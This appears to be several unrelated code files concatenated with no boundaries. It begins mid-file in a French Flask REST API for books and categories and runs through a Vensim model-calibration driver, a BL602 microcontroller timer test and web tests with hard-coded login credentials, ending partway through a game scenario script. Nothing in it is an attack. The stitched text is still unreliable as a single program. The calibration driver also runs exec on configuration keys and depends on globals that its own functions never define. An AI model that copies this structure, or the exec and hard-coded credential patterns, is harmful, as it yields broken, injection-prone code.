'status_code': 200, 'livres': livres, 'total_livres': len(livres) }) except: abort(404) finally: db.session.close() ################################################# # Chercher un livre en particulier par son id + ################################################# @app.route('/livres/<int:id>') def get_book(id): livre = Livre.query.get(id) if livre is None: abort(404) else: return livre.format() ################################################ # Lister la liste des livres d'une categorie ################################################ @app.route('/categories/<int:id>/livres') def book_category(id): try: category = Categorie.query.get(id) books = Livre.query.filter_by(categorie_id=id).all() books = paginate(books) return jsonify({ 'Success': True, 'Status_code': 200, 'total': len(books), 'categorie': category.format(), 'livres': books }) except: abort(404) finally: db.session.close() ####################################### # Lister toutes les categories + ####################################### @app.route('/categories') def get_categories(): categories = Categorie.query.all() categories = paginate(categories) if categories is None: abort(404) else: return jsonify({ 'success': True, 'status_code': 200, 'Categorie': categories, 'total': len(categories) }) ######################################## # Chercher une categorie par son id + ######################################## @app.route('/categories/<int:id>') def get_category(id): categorie = Categorie.query.get(id) if categorie is None: abort(404) else: return categorie.format() ############################ # Supprimer un livre + ############################ @app.route('/livres/<int:id>', methods=['DELETE']) def del_livre(id): try: livr = Livre.query.get(id) livr.delete() return jsonify({ 'success': True, 'id_book': id, 'new_total': livr.query.count() }) except: abort(404) finally: db.session.close() ############################# # Supprimer une categorie + ############################# @app.route('/categories/<int:id>', methods=['DELETE']) def del_categorie(id): try: category = Categorie.query.get(id) category.delete() return jsonify({ 'success': True, 'status': 200, 'id_cat': id, 'new_total': Categorie.query.count() }) except: abort(404) finally: db.session.close() ########################################### # Modifier les informations d'un livre ########################################### @app.route('/livres/<int:id>', methods=['PATCH']) def change_book(id): body = request.get_json() book = Livre.query.get(id) try: if 'titre' in body and 'auteur' in body and 'editeur' in body and 'date_publication' in body: book.titre = body['titre'] book.auteur = body['auteur'] book.editeur = body['editeur'] book.date_publication = body['date_publication'] book.update() return jsonify ({ 'success modify' : True, 'book' : book.format() }) except: abort(404) ######################################## # Modifier le libellé d'une categorie ######################################## @app.route('/categories/<int:id>', methods=['PATCH']) def change_name(id): body = request.get_json() category = Categorie.query.get(id) try: if 'libelle_categorie' in body: category.libelle = body['libelle_categorie'] category.update() return jsonify({ 'success modify' : True, 'category':category.format() }) except: abort(404) ############################################## # Rechercher un livre par son titre ou son auteur ############################################## @app.route('/livres/<string:word>') def search_book(word): mot = '%'+word+'%' titre = Livre.query.filter(Livre.titre.like(mot)).all() titre = paginate(titre) return jsonify({ 'livres': titre }) '''@app.route('/livres/<string:value>') def search_livre(value): val = '%'+value+'%' auteur = Livre.query.filter(Livre.auteur.like(val)).all() auteur = paginate(auteur) return jsonify({ 'livres': auteur })''' ############################################## # Ajouter une categorie ############################################## @app.route('/categories', methods=['POST']) def add_category(): body = request.get_json() new_categorie = body['libelle_categorie'] category = Categorie(libelle=new_categorie) category.insert() return jsonify({ 'success': True, 'added': category.format(), 'total_categories': Categorie.query.count() }) ############################################## # Ajouter un livre ############################################## @app.route('/livres', methods=['POST']) def add_book(): body = request.get_json() isbn = body['isbn'] new_titre = body['titre'] new_date = body['date_publication'] new_auteur = body['auteur'] new_editeur = body['editeur'] categorie_id = body['categorie_id'] livre = Livre(isbn=isbn, titre=new_titre, date_publication=new_date, auteur=new_auteur, editeur=new_editeur, categorie_id=categorie_id) livre.insert() count = Livre.query.count() return jsonify({ 'success': True, 'added': livre.format(), 'total_books': count, }) @app.errorhandler(404) def not_found(error): return (jsonify({'success': False, 'error': 404, 'message': 'Not found'}), 404) @app.errorhandler(400) def error_client(error): return (jsonify({'success': False, 'error': 400, 'message': 'Bad request'}), 400) @app.errorhandler(500) def server_error(error): return (jsonify({'success': False, 'error': 500, 'message': 'internal server error'}), 500) @app.errorhandler(405) def server_error(error): return (jsonify({'success': False, 'error': 405, 'message': 'method not allowed'}), 405)
import os import subprocess import re import json import time import pandas as pd from keyboard import press from shutil import copy from distutils.dir_util import copy_tree class Script(object): """Master object for holding and modifying .cmd script settings, creating .cmd files, and running them through Vensim/Vengine""" def __init__(self, controlfile): print("Initialising", self) for k, v in controlfile['simsettings'].items(): self.__setattr__(k, v if isinstance(v, str) else v.copy()) self.runcmd = "MENU>RUN_OPTIMIZE|o\n" self.savecmd = f"MENU>VDF2TAB|!|!|{self.savelist}|\n" self.basename = controlfile['baserunname'] self.cmdtext = [] def copy_model_files(self, dirname): """Create subdirectory and copy relevant model files to it, then change working directory to subdirectory""" os.makedirs(dirname, exist_ok=True) os.chdir(f"./{dirname}") # Copy needed files from the working directory into the sub-directory for s in ['model', 'payoff', 'optparm', 'sensitivity', 'savelist', 'senssavelist']: if getattr(self, s): copy(f"../{getattr(self, s)}", "./") for slist in ['data', 'changes']: for file in getattr(self, slist): copy(f"../{file}", "./") def add_suffixes(self, settingsfxs): """Cleanly modifies .cmd script settings with specified suffixes""" for s, sfx in settingsfxs.items(): if hasattr(self, s): self.__setattr__(s, getattr(self, s)[:-4] + sfx + getattr(self, s)[-4:]) def update_changes(self, chglist): """Reformats chglist as needed to extend changes settings; see compile_script for details""" # Combines and flattens list of paired change names & suffixes flatlist = [i for s in [[f"{self.basename}_{n}_{sfx}.out" for n in name] if isinstance(name, list) else [f"{self.basename}_{name}_{sfx}.out"] for name, sfx in chglist] for i in s] self.changes.extend(flatlist) def write_script(self, scriptname): """Compiles and writes actual .cmd script file""" self.cmdtext.extend(["SPECIAL>NOINTERACTION\n", f"SPECIAL>LOADMODEL|{self.model}\n"]) for s in ['payoff', 'sensitivity', 'optparm', 'savelist', 'senssavelist']: if hasattr(self, s): self.cmdtext.append(f"SIMULATE>{s}|{getattr(self, s)}\n") if hasattr(self, 'data'): datatext = ','.join(self.data) self.cmdtext.append(f"SIMULATE>DATA|\"{','.join(self.data)}\"\n") if hasattr(self, 'changes'): self.cmdtext.append(f"SIMULATE>READCIN|{self.changes[0]}\n") for file in self.changes[1:]: self.cmdtext.append(f"SIMULATE>ADDCIN|{file}\n") self.cmdtext.extend(["\n", f"SIMULATE>RUNNAME|{scriptname}\n", self.runcmd, self.savecmd, "SPECIAL>CLEARRUNS\n", "MENU>EXIT\n"]) with open(f"{scriptname}.cmd", 'w') as scriptfile: scriptfile.writelines(self.cmdtext) def run_script(self, scriptname, controlfile, subdir, logfile): """Runs .cmd script file using function robust to Vengine errors, and returns payoff value if applicable""" return run_vengine_script(scriptname, controlfile['vensimpath'], controlfile['timelimit'], '.log', check_opt, logfile) class CtyScript(Script): """Script subclass for country optimization runs""" def __init__(self, controlfile): super().__init__(controlfile) self.genparams = controlfile['genparams'].copy() def prep_subdir(self, scriptname, controlfile, subdir): """Creates subdirectory for country-specific files and output""" self.copy_model_files(subdir) copy(f"../{scriptname}.cmd", "./") self.genparams.append(f"[{subdir}]") for file in self.changes: clean_outfile(file, self.genparams) def run_script(self, scriptname, controlfile, subdir, logfile): self.prep_subdir(scriptname, controlfile, subdir) run_vengine_script(scriptname, controlfile['vensimpath'], controlfile['timelimit'], '.log', check_opt, logfile) copy(f"./{scriptname}.out", "..") # Copy the .out file to parent directory os.chdir("..") class CtyMCScript(CtyScript): """Script subclass for country MCMC optimizations""" def run_script(self, scriptname, controlfile, subdir, logfile): self.prep_subdir(scriptname, controlfile, subdir) run_vengine_script(scriptname, controlfile['vensimpath'], controlfile['timelimit'], '_MCMC_points.tab', check_MC, logfile) # Create downsample and copy to parent directory downsample(scriptname, controlfile['samplefrac']) copy(f"./{scriptname}_MCMC_sample_frac.tab", "..") copy(f"./{scriptname}.out", "..") # Copy the .out file to parent directory os.chdir("..") class LongScript(Script): """Script subclass for long calibration runs e.g. all-params""" def run_script(self, scriptname, controlfile, subdir, logfile): return run_vengine_script(scriptname, controlfile['vensimpath'], controlfile['timelimit']*5, '.log', check_opt, logfile) class ScenScript(Script): """Script subclass for scenario analysis with .cin files""" def update_changes(self, chglist): scen = chglist.pop() super().update_changes(chglist) self.changes.append(scen) chglist.append(scen) def run_script(self, scriptname, controlfile, subdir, logfile): return run_vengine_script(scriptname, controlfile['vensimpath'], controlfile['timelimit'], '.vdf', check_run, logfile) class ScenRunScript(ScenScript): """Script subclass for scenario analysis runs (not optimizations)""" def __init__(self, controlfile): super().__init__(controlfile) self.runcmd = "MENU>RUN|o\n" class ScenSensScript(ScenScript): """Script subclass for scenario sensitivity analysis""" def __init__(self, controlfile): super().__init__(controlfile) self.sensitivity = self.basename + '_full.vsc' self.runcmd = "MENU>RUN_SENSITIVITY|o\n" self.savecmd = f"MENU>SENS2FILE|!|!|%#[\n" class SMSensScript(ScenScript): """Script subclass for submodel sensitivity analysis""" def __init__(self, controlfile): super().__init__(controlfile) self.runcmd = "MENU>RUN_SENSITIVITY|o\n" self.savecmd = f"MENU>SENS2FILE|!|!|>T\n" def compile_script(controlfile, scriptclass, name, namesfx, settingsfxs, logfile, chglist=[], subdir=None): """Master function for assembling & running .cmd script Parameters ---------- controlfile : JSON object Master control file specifying sim settings, runname, etc. scriptclass : Script object Type of script object to instantiate, depending on run type name : str namesfx : str Along with `name`, specifies name added to baserunname for run settingsfxs : dict of str Dict of suffixes to append to filenames in simsettings; use to distinguish versions of e.g. .mdl, .voc, .vpd etc. files logfile : str of filename/path chglist : list of tuples of (str or list, str) Specifies changes files to be used in script; specify as tuples corresponding to `name`, `namesfx` of previous run .out to use; tuples can also take a list of `names` as first element, taking each with the same second element; `chglist` can also take one non-tuple str as its last element, which will be added directly (e.g. for policy scenario .cin files) subdir : str, optional Name of subdirectory to create/use for run, if applicable Returns ------- float Payoff value of the script run, if applicable, else 0 """ mainscript = scriptclass(controlfile) mainscript.add_suffixes(settingsfxs) mainscript.update_changes(chglist) scriptname = f"{mainscript.basename}_{name}_{namesfx}" mainscript.write_script(scriptname) return mainscript.run_script(scriptname, controlfile, subdir, logfile) def write_log(string, logfile): """Writes printed script output to a logfile""" with open(logfile,'a') as f: f.write(string + "\n") print(string) def check_opt(scriptname, logfile): """Check function for use with run_vengine_script for optimizations""" if check_zeroes(scriptname): write_log(f"Help! {scriptname} is being repressed!", logfile) return not check_zeroes(scriptname) def check_MC(scriptname, logfile, threshold=0.01): """Check function for use with run_vengine_script for MCMC""" if abs(compare_payoff(scriptname, logfile)) >= threshold: write_log(f"{scriptname} is a self-perpetuating autocracy! re-running MC...", logfile) return False return True def check_run(scriptname, logfile): """Check function for use with run_vengine_script for normal & sens runs""" if not os.path.exists(f"./{scriptname}.vdf"): write_log(f"Help! {scriptname} is being repressed!", logfile) return os.path.exists(f"./{scriptname}.vdf") def run_vengine_script(scriptname, vensimpath, timelimit, checkfile, check_func, logfile): """Call Vensim with command script using subprocess; monitor output file for changes to see if Vensim has stalled out, and restart if it does, or otherwise bugs out; return payoff if applicable""" write_log(f"Initialising {scriptname}!", logfile) while True: proc = subprocess.Popen(f"{vensimpath} \"./{scriptname}.cmd\"") time.sleep(2) press('enter') # Necessary to bypass the popup message in Vengine while True: try: # Break out of loop if run completes within specified timelimit proc.wait(timeout=timelimit) break except subprocess.TimeoutExpired: try: # If run not complete before timelimit, check to see if still ongoing write_log(f"Checking for {scriptname}{checkfile}...", logfile) timelag = time.time() - os.path.getmtime(f"./{scriptname}{checkfile}") if timelag < (timelimit): write_log(f"At {time.ctime()}, {round(timelag,3)}s since last output, " "continuing...", logfile) continue else: # If output isn't being written, kill and restart run proc.kill() write_log(f"At {time.ctime()}, {round(timelag,3)}s since last output. " "Calibration timed out!", logfile) break except FileNotFoundError: # If output isn't being written, kill and restart run proc.kill() write_log("Calibration timed out!", logfile) break if proc.returncode != 1: # Note that Vengine returns 1 on MENU>EXIT, not 0! write_log(f"Return code is {proc.returncode}", logfile) write_log("Vensim! Trying again...", logfile) continue try: # Ensure output is not bugged (specifics depend on type of run) if check_func(scriptname, logfile): break except FileNotFoundError: write_log("Outfile not found! That's it, I'm dead.", logfile) pass time.sleep(2) if os.path.exists(f"./{scriptname}.out"): payoffvalue = read_payoff(f"{scriptname}.out") write_log(f"Payoff for {scriptname} is {payoffvalue}, calibration complete!", logfile) return payoffvalue return 0 # Set default payoff value for simtypes that don't generate one def modify_mdl(country, modelname, newmodelname): """Opens .mdl as text, identifies Rgn subscript, and replaces with appropriate country name""" with open(modelname,'r') as f: filedata = f.read() rgnregex = re.compile(r"Rgn(\s)*?:(\n)?[\s\S]*?(\n\t~)") newdata = rgnregex.sub(f"Rgn:\n\t{country}\n\t~", filedata) with open(newmodelname,'w') as f: f.write(newdata) def split_voc(vocname, fractolfactor, mcsettings): """Splits .VOC file into multiple versions, for main, country, initial, full model, general MCMC, and country MCMC calibration""" with open(vocname,'r') as f0: filedata = f0.readlines() vocmain = [line for line in filedata if line[0] == ':' or '[Rgn]' not in line] voccty = [line for line in filedata if line[0] == ':' or '[Rgn]' in line] vocfull = filedata.copy() vocinit = voccty.copy() # Identify and multiply fracitonal tolerance by fractolfactor for initial runs for l, line in enumerate(vocinit): if ':FRACTIONAL_TOLERANCE' in line: fractol = float(line.split('=')[1]) vocinit[l] = f":FRACTIONAL_TOLERANCE={min(fractol*fractolfactor,0.1)}\n" # Set restarts to 1 for vocs besides initial for voc in (vocmain, voccty, vocfull): for l, line in enumerate(voc): if ':RESTART_MAX' in line: voc[l] = ':RESTART_MAX=1\n' vocmainmc = ''.join(vocmain) vocctymc = ''.join(voccty) # Make necessary substitutions for MCMC settings for k,v in mcsettings.items(): vocmainmc = re.sub(f":{re.escape(k)}=.*", f":{k}={v}", vocmainmc) vocctymc = re.sub(f":{re.escape(k)}=.*", f":{k}={v}", vocctymc) # Write various voc versions to separate .voc files for fname, suffix in zip([vocmain, voccty, vocinit, vocfull, vocmainmc, vocctymc], ['m', 'c', 'i', 'f', 'mmc', 'cmc']): with open(f"{vocname[:-4]}_{suffix}.voc", 'w') as f: f.writelines(fname) def check_zeroes(scriptname): """Check if an .out file has any parameters set to zero (indicates Vengine error), return True if any parameters zeroed OR if # runs = # restarts, and False otherwise""" filename = f"{scriptname}.out" with open(filename,'r') as f0: filedata = f0.readlines() checklist = [] for line in filedata: if line[0] != ':': if ' = 0 ' in line: checklist.append(True) else: checklist.append(False) elif ':RESTART_MAX' in line: restarts = re.findall(r'\d+', line)[0] # Ensure number of simulations != number of restarts if f"After {restarts} simulations" in filedata[0]: checklist.append(True) return any(checklist) def clean_outfile(outfilename, linekey): """Clean an outfile to include only lines containing a string in [linekey] Note that [linekey] should be a list of strings to keep""" with open(outfilename,'r') as f: filedata = f.readlines() newdata = [line for line in filedata if any(k in line for k in linekey)] with open(outfilename, 'w') as f: f.writelines(newdata) def create_mdls(controlfile, logfile): """Creates copies of the base .mdl file for each country in list (and one main copy) and splits .VOC files""" model = controlfile['simsettings']['model'] for c in controlfile['countrylist']: newmodel = model[:-4] + f'_{c}.mdl' modify_mdl(c, model, newmodel) mainmodel = model[:-4] + '_main.mdl' c_list = [f'{c}\\\n\t\t' if i % 8 == 7 else c for i,c in enumerate(countrylist)] countrylist_str = str(c_list)[1:-1].replace("'","") modify_mdl(countrylist_str, model, mainmodel) split_voc(controlfile['simsettings']['optparm'], controlfile['fractolfactor'], controlfile['mcsettings']) write_log("Files are ready! moving to calibration", logfile) def read_payoff(outfile, line=1): """Identifies payoff value from .OUT or .REP file - use line 1 (default) for .OUT, or use line 0 for .REP""" with open(outfile) as f: payoffline = f.readlines()[line] payoffvalue = [float(s) for s in re.findall(r'-?\d+\.?\d+[eE+-]*\d+', payoffline)][0] return payoffvalue def compare_payoff(scriptname, logfile): """Returns the difference in payoffs between .OUT and .REP file, which should be zero in most cases except when MCMC bugs out""" difference = read_payoff(f"{scriptname}.out") - read_payoff(f"{scriptname}.rep", 0) write_log(f".OUT and .REP payoff difference is {difference}", logfile) return difference def increment_seed(vocfile, logfile): """Increments random number seed in a .VOC file by 1""" with open(vocfile, 'r') as f: vocdata = f.read() seedregex = re.compile(r':SEED=\d+') try: i = int(re.search(r'\d+', re.search(seedregex, vocdata).group()).group()) newdata = seedregex.sub(f":SEED={i+1}", vocdata) with open(vocfile, 'w') as f: f.write(newdata) except: write_log("No seed found, skipping incrementing.", logfile) def downsample(scriptname, samplefrac): """Downsamples an MCMC _sample tab file according to specified samplefrac, then deletes MCMC _sample and _points files to free up disk space (files can be VERY large otherwise!)""" rawdf = pd.read_csv(f"{scriptname}_MCMC_sample.tab", sep='\t') newdf = rawdf.sample(frac=samplefrac) newdf.to_csv(f"{scriptname}_MCMC_sample_frac.tab", sep='\t', index=False) os.remove(f"{scriptname}_MCMC_sample.tab") os.remove(f"{scriptname}_MCMC_points.tab") def merge_samples(baserunname, countrylist): """Combines downsampled MCMC outputs into a single sensitivity input tabfile and creates .vsc file using it for sensitivity control""" filelist = [f"{baserunname}_{c}_MC_MCMC_sample_frac.tab" for c in countrylist] dflist = [] for f in filelist: ctydf = pd.read_csv(f, sep='\t') dflist.append(ctydf) sensdf = pd.concat(dflist, axis=1) sensdf.dropna(axis=1, how='all', inplace=True) sensdf.dropna().to_csv(f"{baserunname}_full_sample_frac.tab", sep='\t', index=False) with open(f"{baserunname}_full.vsc", 'w') as f: f.write(f",F,,{baserunname}_full_sample_frac.tab,0") controlfilename = input("Enter control file name (with extension):") cf = json.load(open(controlfilename, 'r')) # Unpack controlfile into variables for k,v in cf.items(): exec(k + '=v') # Set up files in run directory and initialise logfile master = Script(cf) master.changes.extend(scenariolist) master.copy_model_files(f"{baserunname}_IterCal") copy(f"../{controlfilename}", "./") logfile = f"{os.getcwd()}/{baserunname}.log" write_log(f"-----\nStarting new log at {time.ctime()}\nReady to work!", logfile) # Initialise necessary .mdl and .voc files create_mdls(cf, logfile) # If iterlimit set to 0 (bypass), go straight to all-params Powell optimization if iterlimit == 0: write_log("Iteration is no basis for a system of estimation. Bypassing!", logfile) # Skip all-params if previously already done if os.path.exists(f"./{baserunname}_main_full.out"): write_log("Hang on to outdated imperialist dogma! Using previous output...", logfile) else: compile_script(cf, LongScript, 'main', 'full', {'model': '_main', 'optparm': '_f'}, logfile) # Otherwise run iterative calibration process as normal else: # First do initial calibration round for c in countrylist: compile_script(cf, CtyScript, c, 0, {'model': f'_{c}', 'optparm': '_i'}, logfile, subdir=c) payoff_list = [compile_script(cf, Script, 'main', 0, {'model': '_main', 'optparm': '_m'}, logfile, chglist=[(countrylist, 0)])] payoff_delta = abs(payoff_list[0]) i = 1 # Then iterate until convergence or until limit is reached while payoff_delta > threshold: write_log(f"More work? Okay! Starting iteration {i}", logfile) for c in countrylist: compile_script(cf, CtyScript, c, i, {'model': f'_{c}', 'optparm': '_c'}, logfile, chglist=[('main', i-1), (c, i-1)], subdir=c) payoff_list.append( compile_script(cf, Script, 'main', i, {'model': '_main', 'optparm': '_m'}, logfile, chglist=[('main', i-1), (countrylist, i)])) payoff_delta = abs(payoff_list[-1] - payoff_list[-2]) i += 1 # Increment random number seeds for VOC files increment_seed(f"{simsettings['optparm'][:-4]}_c.voc", logfile) increment_seed(f"{simsettings['optparm'][:-4]}_m.voc", logfile) write_log(f"Payoff list thus far is {payoff_list}", logfile) write_log(f"Payoff delta is {payoff_delta}", logfile) if i > iterlimit: write_log("Iteration limit reached!", logfile) break else: write_log("Payoff delta is less than threshold. Moving on!", logfile) # Run one more full calibration with all parameters compile_script(cf, LongScript, 'main', 'full', {'model': '_main', 'optparm': '_f'}, logfile, chglist=[('main', i-1), (countrylist, i-1)]) # If MCMC option is on, initialise MCMC if mccores != 0: write_log("We're an anarcho-syndicalist commune!\n" f"Initiating MCMC at {time.ctime()}!", logfile) for c in countrylist: compile_script(cf, CtyMCScript, c, 'MC', {'model': f'_{c}', 'optparm': '_cmc'}, logfile, chglist=[('main', 'full')], subdir=c) write_log(f"MCMC completed at {time.ctime()}!", logfile) # Run fixed & sensitivity analysis for each scenario specified merge_samples(baserunname, countrylist) for cin in scenariolist: chglist = [('main', 'full'), (countrylist, 'MC'), cin] write_log(f"Running scenario {cin}!", logfile) compile_script(cf, ScenRunScript, 'final', cin[:-4], {'model': '_main'}, logfile, chglist=chglist) compile_script(cf, ScenSensScript, 'sens', cin[:-4], {'model': '_main'}, logfile, chglist=chglist) time.sleep(2) # Run any submodels specified using their own controlfiles for submod in submodlist: copy_tree(f"../{submod}", f"./{submod}") os.chdir(f"./{submod}") smcf = json.load(open(f"{submod}Control.txt", 'r')) for k in ['baserunname', 'vensimpath']: smcf[k] = cf[k] for file in smcf['simsettings']['changes'] + smcf['simsettings']['data']: copy(f"../{file}", "./") copy(f"../{smcf['baserunname']}_main_full.out", "./") clean_outfile(f"{smcf['baserunname']}_main_full.out", smcf['submodparams']) write_log(f"Running submodel {submod}!", logfile) compile_script(smcf, ScenRunScript, submod, 'base', {}, logfile, chglist=[f"{smcf['baserunname']}_main_full.out"], subdir=None) if smcf['simsettings']['sensitivity']: write_log(f"Sensitivity time for {submod}!", logfile) compile_script(smcf, SMSensScript, submod, 'sens', {}, logfile, chglist=[f"{smcf['baserunname']}_main_full.out"], subdir=None) os.chdir("..") # Remember to go back to main directory before next submodel run! # Run sensitivity scenarios using specified variable-value combinations for var, value in sensvars: var_val = f"{var.replace(' ','')[:8]}_{str(value).replace('.','')}" with open(f"{var_val}.cin",'w') as f: f.write(f"{var} = {value}") write_log(f"Running robustness check for {var} = {value}!", logfile) cf['simsettings']['changes'].append(f"{var_val}.cin") compile_script(cf, LongScript, 'sens', var_val, {'model': '_main', 'optparm': '_f'}, logfile, chglist=[('main', 'full')]) compile_script(cf, ScenRunScript, 'sens', f'{var_val}_{scenariolist[0][:-4]}', {'model': '_main'}, logfile, chglist=[('sens', var_val), scenariolist[0]]) cf['simsettings']['changes'].pop() # Remember to remove robustness CIN file! # Run recalibration on sub-sample of countries, dropping those specified for group, drops in droplist.items(): write_log("\'tis but a scratch! Have at you!", logfile) shortlist = [c for c in countrylist if c not in drops] shortmodel = simsettings['model'][:-4] + f'_{group}.mdl' c_list = [f'{c}\\\n\t\t' if i % 8 == 7 else c for i,c in enumerate(shortlist)] countrylist_str = str(c_list)[1:-1].replace("'","") modify_mdl(countrylist_str, simsettings['model'], shortmodel) compile_script(cf, LongScript, 'sens', group, {'model': f'_{group}', 'optparm': '_f'}, logfile, chglist=[('main', 'full')]) compile_script(cf, ScenRunScript, 'sens', f'{group}_{scenariolist[0][:-4]}', {'model': f'_{group}'}, logfile, chglist=[('sens', group), scenariolist[0]]) write_log(f"Log completed at {time.ctime()}. Job done!", logfile)
from __future__ import print_function from __future__ import unicode_literals import time import re from tiny_test_fw import DUT, App, TinyFW from ttfw_bl import BL602App, BL602DUT @TinyFW.test_method(app=BL602App.BL602App, dut=BL602DUT.BL602TyMbDUT, test_suite_name='bl602_demo_timer_tc') def bl602_demo_timer_tc(env, extra_data): # first, flash dut # then, test dut = env.get_dut("port0", "fake app path") print('Flashing app') dut.flash_app(env.log_path, env.get_variable('flash')) print('Starting app') dut.start_app() timestamp_seq = [] timediff_seq = [] try: dut.expect("Booting BL602 Chip...", timeout=0.5) print('BL602 booted') dut.expect('Init CLI with event Driven', timeout=0.5) print('BL602 CLI init done') time.sleep(0.1) dut.write('timer_us') time.sleep(0.1) timestamp = dut.expect(re.compile(r"Timer2 value is (\d+)"), timeout=0.1) timestamp_seq.append(int(timestamp[0])) time.sleep(0.9) dut.write('timer_us') time.sleep(0.1) timestamp = dut.expect(re.compile(r"Timer2 value is (\d+)"), timeout=0.1) timestamp_seq.append(int(timestamp[0])) time.sleep(0.9) dut.write('timer_us') time.sleep(0.1) timestamp = dut.expect(re.compile(r"Timer2 value is (\d+)"), timeout=0.1) timestamp_seq.append(int(timestamp[0])) time.sleep(0.9) dut.write('timer_us') time.sleep(0.1) timestamp = dut.expect(re.compile(r"Timer2 value is (\d+)"), timeout=0.1) timestamp_seq.append(int(timestamp[0])) time.sleep(0.9) dut.write('timer_us') time.sleep(0.1) timestamp = dut.expect(re.compile(r"Timer2 value is (\d+)"), timeout=0.1) timestamp_seq.append(int(timestamp[0])) time.sleep(0.9) timestamp_last = 0 for timestamp in timestamp_seq: if 0 == timestamp : raise if 0 == timestamp_last : timestamp_last = timestamp continue timediff_seq.append(timestamp - timestamp_last) timestamp_last = timestamp for timediff in timediff_seq: print(f'time diff is {timediff}') for timediff in timediff_seq: if timediff < 900000 or timediff > 1100000: print(f'time diff is NOT ok: {timediff}') raise dut.halt() except DUT.ExpectTimeout: print('ENV_TEST_FAILURE: BL602 example test failed') raise if __name__ == '__main__': bl602_demo_timer_tc()
import requests import json import pytest import frontend from frontend import app import sys """ Test GET and POST functionality for both endpoints """ def test_redirect_home_to_login(): session = requests.Session() session.auth = ("reid", "reidreid") x = session.get("http://guadr.gonzaga.edu/home") assert str(x.url[20:25] == 'login') def test_login(): session = requests.Session() session.auth = ("reid", "reidreid") x = session.get("http://guadr.gonzaga.edu/login") assert x.status_code == 200 def test_signup(): session = requests.Session() session.auth = ("reid", "reidreid") x = session.get("http://guadr.gonzaga.edu/signup") assert x.status_code == 200 def test_vendor(): session = requests.Session() session.auth = ("reid", "reidreid") x = session.get("http://guadr.gonzaga.edu/vender") assert x.status_code == 200 """ Test DB """ def test_DB(): with app.app_context(): frontend.init_db() frontend.insert_into_db( "INSERT INTO robot_location (del_id, time, latitude, longitude,perc_complete) VALUES (0,0,0,0,0.0)" ) result = frontend.query_db("select * from robot_location where del_id = 0") result_fail = frontend.query_db( "select * from robot_location where del_id = -1" ) assert result != [] assert result_fail == []
from ScenarioHelper import * def main(): CreateScenaFile( "e302b.bin", # FileName "e302b", # MapName "e302b", # Location 0x0000, # MapIndex "ed7513", 0x00002000, # Flags ("", "", "", "", "", ""), # include 0x00, # PlaceNameNumber 0x00, # PreInitFunctionIndex b'\x00\xff\xff', # Unknown_51 # Information [0, 0, -1000, 0, 0, 0, 24000, 500, 30, 45, 0, 360, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 2], ) BuildStringList(( "e302b", # 0 "正骑士阿巴斯", # 1 "约纳", # 2 "瓦吉", # 3 "缇欧", # 4 "芙兰", # 5 "莉夏", # 6 "兰迪", # 7 "诺艾尔", # 8 "艾莉", # 9 "麦克道尔议长", # 10 "格蕾丝", # 11 "神狼蔡特", # 12 "随从骑士维恩图斯", # 13 "随从骑士朱诺", # 14 )) AddCharChip(( "chr/ch06712.itc", # 00 "chr/ch06102.itc", # 01 "chr/ch03100.itc", # 02 "chr/ch03102.itc", # 03 "chr/ch00202.itc", # 04 "chr/ch06900.itc", # 05 "chr/ch03200.itc", # 06 "chr/ch00302.itc", # 07 "chr/ch06002.itc", # 08 "chr/ch02902.itc", # 09 "chr/ch00102.itc", # 0A "chr/ch05802.itc", # 0B "chr/ch02710.itc", # 0C "chr/ch48400.itc", # 0D )) DeclNpc(101790, 150, -94010, 90, 261, 0x0, 0, 0, 0, 255, 255, 0, 13, 255, 0) DeclNpc(3000, -1350, 6960, 45, 261, 0x0, 0, 1, 0, 255, 255, 0, 15, 255, 0) DeclNpc(101790, 150, -95980, 90, 261, 0x0, 0, 3, 0, 255, 255, 0, 11, 255, 0) DeclNpc(-3119, -1350, 7039, 315, 261, 0x0, 0, 4, 0, 255, 255, 0, 7, 255, 0) DeclNpc(100849, 0, 270, 270, 261, 0x0, 0, 5, 0, 0, 0, 0, 14, 255, 0) DeclNpc(-1500, 0, -1500, 0, 389, 0x0, 0, 6, 0, 255, 255, 255, 255, 255, 0) DeclNpc(97639, 170, 959, 90, 261, 0x0, 0, 7, 0, 255, 255, 0, 8, 255, 0) DeclNpc(100309, 170, 959, 270, 261, 0x0, 0, 9, 0, 255, 255, 0, 9, 255, 0) DeclNpc(100169, 100, -102720, 270, 261, 0x0, 0, 10, 0, 255, 255, 0, 6, 255, 0) DeclNpc(98440, 100, -101110, 180, 261, 0x0, 0, 11, 0, 255, 255, 0, 17, 255, 0) DeclNpc(100220, 100, -104779, 270, 261, 0x0, 0, 8, 0, 255, 255, 0, 16, 255, 0) DeclNpc(-3000, 0, -2500, 0, 389, 0x0, 0, 12, 0, 255, 255, 255, 255, 255, 0) DeclNpc(103569, 0, -97089, 270, 257, 0x0, 0, 13, 0, 0, 0, 0, 19, 255, 0) DeclNpc(103949, 0, -209, 270, 257, 0x0, 0, 13, 0, 0, 0, 0, 21, 255, 0) DeclActor(102510, 0, -97020, 1000, 103570, 1500, -97090, 0x007E, 0, 18, 0x0000) DeclActor(102710, 0, -200, 400, 103950, 1500, -210, 0x007E, 0, 20, 0x0000) DeclActor(2350, 0, -92230, 800, 2350, 1500, -92230, 0x007C, 0, 28, 0x0000) DeclActor(103750, 0, -105640, 2000, 103750, 1500, -105640, 0x007C, 0, 3, 0x0000) ChipFrameInfo(864, 0) # 0 ScpFunction(( "Function_0_360", # 00, 0 "Function_1_410", # 01, 1 "Function_2_509", # 02, 2 "Function_3_54E", # 03, 3 "Function_4_6F6", # 04, 4 "Function_5_831", # 05, 5 "Function_6_D2D", # 06, 6 "Function_7_102D", # 07, 7 "Function_8_1522", # 08, 8 "Function_9_1849", # 09, 9 "Function_10_1967", # 0A, 10 "Function_11_1DBE", # 0B, 11 "Function_12_1EFF", # 0C, 12 "Function_13_24BA", # 0D, 13 "Function_14_26EA", # 0E, 14 "Function_15_2810", # 0F, 15 "Function_16_2BBE", # 10, 16 "Function_17_2F67", # 11, 17 "Function_18_3243", # 12, 18 "Function_19_3247", # 13, 19 "Function_20_3519", # 14, 20 "Function_21_351D", # 15, 21 "Function_22_3700", # 16, 22 "Function_23_3D9F", # 17, 23 "Function_24_43E0", # 18, 24 "Function_25_4A48", # 19, 25 "Function_26_52F2", # 1A, 26 "Function_27_5B69", # 1B, 27 "Function_28_5F76", # 1C, 28 "Function_29_6871", # 1D, 29 "Function_30_6891", # 1E, 30 )) def Function_0_360(): pass label("Function_0_360") Switch( (scpexpr(EXPR_RAND), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_IMOD), scpexpr(EXPR_END)), (0, 